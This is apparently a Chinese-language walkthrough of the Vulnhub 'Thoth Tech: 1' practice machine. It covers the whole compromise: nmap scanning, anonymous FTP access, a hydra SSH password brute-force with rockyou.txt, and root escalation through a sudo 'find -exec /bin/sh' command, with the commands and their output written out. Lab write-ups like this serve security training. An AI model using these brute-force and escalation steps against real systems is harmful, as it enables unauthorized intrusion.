Vulnhub之Thoth靶机详细测试过程
Thoth
作者: Jason_huawen
靶机基本信息
名称:Thoth Tech: 1
地址:
https://www.vulnhub.com/entry/thoth-tech-1,734/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:6f:27:91 1 60 PCS Systemtechnik GmbH
192.168.56.127 08:00:27:2b:0f:8b 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.127
NMAP扫描
利用NMAP工具对目标主机进行全端口扫描:
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.127 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 03:10 EST
Nmap scan report for bogon (192.168.56.127)
Host is up (0.000085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 110 Jul 02 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f:ab:7b (RSA)
| 256 78:ca:86:73:b6:87:06:08:eb:7a:9c:ab:cf:9d:89:16 (ECDSA)
|_ 256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2B:0F:8B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds
NMAP扫描结果表明目标主机有3个开放端口21(FTP)、22(SSH)、80(HTTP)
获得Shell
根据NMAP扫描结果,首先收集FTP服务的信息:
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ftp 192.168.56.127
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60624|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 110 Jul 02 2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||30557|)
150 Opening BINARY mode data connection for note.txt (110 bytes).
100% |*********************************************************************************| 110 65.30 KiB/s 00:00 ETA
226 Transfer complete.
110 bytes received in 00:00 (54.91 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
目标主机允许FTP匿名访问,从目标主机FTP下载下来的Note.txt文件有如下信息:
-
用户名pwnlad, 而且其密码非常弱,但是不知道是FTP还是SSH,或者其他服务的密码?
-
用户名jake,也许是管理员角色
既然密码比较肉,作者提示很清楚,那就用hydra工具进行破解:
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.127
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-10 03:18:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.127:22/
[STATUS] 124.00 tries/min, 124 tries in 00:01h, 14344279 to do in 1927:60h, 12 active
[22][ssh] host: 192.168.56.127 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-10 03:21:02
结果用hydra工具在较短的时间内就破解出pwnlab的密码,本来还在猜是否是FTP或者甚至其他服务的密码?
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ssh pwnlab@192.168.56.127
The authenticity of host '192.168.56.127 (192.168.56.127)' can't be established.
ED25519 key fingerprint is SHA256:92r1ZGJ7wYMcpzTK4CtNCLO1ib7UJVa+pSM1K3y/guc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.127' (ED25519) to the list of known hosts.
pwnlab@192.168.56.127's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 10 Dec 2022 08:22:21 AM UTC
System load: 0.0 Processes: 118
Usage of /: 24.3% of 19.56GB Users logged in: 0
Memory usage: 18% IPv4 address for enp0s3: 192.168.56.127
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jul 2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$ id
uid=1001(pwnlab) gid=1001(pwnlab) groupwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
ps=1001(pwnlab)
pwnlab@thothtech:~$
这样很轻松就拿到了user flag.
提权
二话不说,既然已经知道了pwnlab的密码,那看一下是否有sudo权限?
pwnlab@thothtech:~$ cat .bash_history
cd root/
sudo nano /etc/vsftpd.conf
sudo su
su thoth_tech
ls
id
sudo -l
sudo find . -exec /bin/sh \; -quit
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
哈哈,轻松得很,可以通过find命令进行提权,具体提权方法,可以查询GTFOBINS网站:
pwnlab@thothtech:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# cd /root
# ls -alh
total 40K
drwx------ 5 root root 4.0K Jul 2 2021 .
drwxr-xr-x 20 root root 4.0K Jun 28 2021 ..
-rw------- 1 root root 14 Jul 2 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 28 2021 .local
-rw------- 1 root root 146 Jun 28 2021 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 57 Jul 2 2021 root.txt
drwxr-xr-x 3 root root 4.0K Jun 28 2021 snap
drwx------ 2 root root 4.0K Jun 28 2021 .ssh
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job :)
#
至此已经拿到了root shell。 甚至没有对80端口进行分析。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号